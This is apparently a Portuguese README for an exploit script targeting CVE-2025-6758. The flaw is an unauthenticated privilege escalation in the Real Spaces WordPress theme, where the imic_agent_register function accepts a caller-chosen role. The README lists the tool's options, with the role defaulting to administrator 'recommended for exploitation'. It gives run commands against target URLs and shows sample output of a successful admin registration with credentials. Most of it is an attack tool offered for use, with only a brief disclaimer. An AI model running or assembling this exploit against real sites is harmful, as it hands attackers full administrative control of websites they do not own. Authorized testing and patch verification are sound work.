
Real Spaces - Tema WordPress de Diretório de Imóveis <= 3.6 - Escalação de Privilégios Não Autenticada para Administrador
imic_agent_registerCVE-2025-6758
Pontuação CVSS: 9.8 (Crítica)
O Real Spaces - Tema de Diretório de Propriedades para WordPress é vulnerável à escalada de privilégios por meio da função imic_agent_register em todas as versões até 3.6 inclusive.
Essa vulnerabilidade surge de restrições insuficientes na atribuição de papéis durante o registro, permitindo que atacantes não autenticados especifiquem arbitrariamente seu papel, incluindo Administrator, ao registrar um novo usuário.
Essa falha crítica permite que atacantes remotos obtenham acesso administrativo total a sites WordPress que executam versões vulneráveis do tema, comprometendo a integridade e a segurança do sistema afetado.
CVE-2025-6758.py é um script profissional de exploit e automação escrito em Python para demonstrar e aproveitar essa vulnerabilidade.
O script é feito para testadores de penetração e pesquisadores de segurança, fornecendo descoberta automatizada, extração de nonce e exploração de forma altamente confiável, modular e silenciosa.
| Argumento | Valor Padrão | Descrição |
|---|---|---|
--username | Nxploited | Define um nome de usuário personalizado para o registro |
--password | 123456789 | Define uma senha personalizada para o registro |
--email | [email protected] | Define um endereço de e-mail personalizado |
--position | Nxploitedadmin | Define um valor de posição personalizado |
--role | administrator | Define o papel de registro (Administrator recomendado para exploração) |
--max-pages | 30 | Número máximo de páginas a rastrear para descoberta de nonce |
--max-depth | 2 | Profundidade máxima de rastreamento de links |
--scan-common-paths | None | Escaneia caminhos adicionais de registro/plugin/tema em busca de nonce (apenas flag) |
--ajax-path | wp-admin/admin-ajax.php | Endpoint POST AJAX personalizado |
--verify-ssl | None | Ativa a verificação de certificado SSL (apenas flag) |
--cookie-save | None | Caminho para salvar cookies de sessão (formato pickle) |
--save-json | None | Caminho para salvar resultados da descoberta de nonce como JSON |
--debug | None | Ativa logs de depuração e imprime trechos de HTML/JS (apenas flag) |
python3 CVE-2025-6758.py -u http://TARGET/wordpress/
--username Define um nome de usuário personalizado (padrão: Nxploited)--password Define uma senha personalizada (padrão: 123456789)--email Define um e-mail personalizado (padrão: [email protected])--position Define uma posição personalizada (padrão: Nxploitedadmin)--role Define o papel do usuário (padrão: administrator)--max-pages Número máximo de páginas a rastrear para descoberta de nonce (padrão: 30)--max-depth Profundidade máxima de rastreamento de links (padrão: 2)--scan-common-paths Escaneia caminhos adicionais de registro/plugin/tema--ajax-path Endpoint POST AJAX personalizado (padrão: wp-admin/admin-ajax.php)--verify-ssl Ativa a verificação de certificado SSL--cookie-save Caminho para salvar cookies de sessão--save-json Caminho para salvar resultados da descoberta de nonce como JSON--debug Ativa logs de depuração e imprime trechos de HTML/JSpython3 CVE-2025-6758.py -u http://192.168.100.74:888/wordpress/ --username AdminX --password MySecretPass123 --scan-common-paths --debug
Após a exploração bem-sucedida, o script exibirá:
[+] Exploitation successful.
[+] Server message: You're successfully register
[+] Username: Nxploited
[+] Password: 123456789
[+] Email: [email protected]
Se a exploração falhar ou o nonce não for encontrado, mensagens de erro descritivas e dicas para solução de problemas adicionais serão exibidas.
Este script destina-se exclusivamente a fins educacionais, de pesquisa e de testes de penetração autorizados.
Qualquer uso não autorizado contra sites ou sistemas sem permissão escrita explícita do proprietário é estritamente proibido e pode ser ilegal.
O autor não assume responsabilidade por uso indevido ou danos resultantes do uso deste script.
📧 E-mail: [email protected]
📨 Telegram: @Kxploit
📡 Canal do Telegram: @KNxploited
Por: Nxploited ( Khaled Alenazi )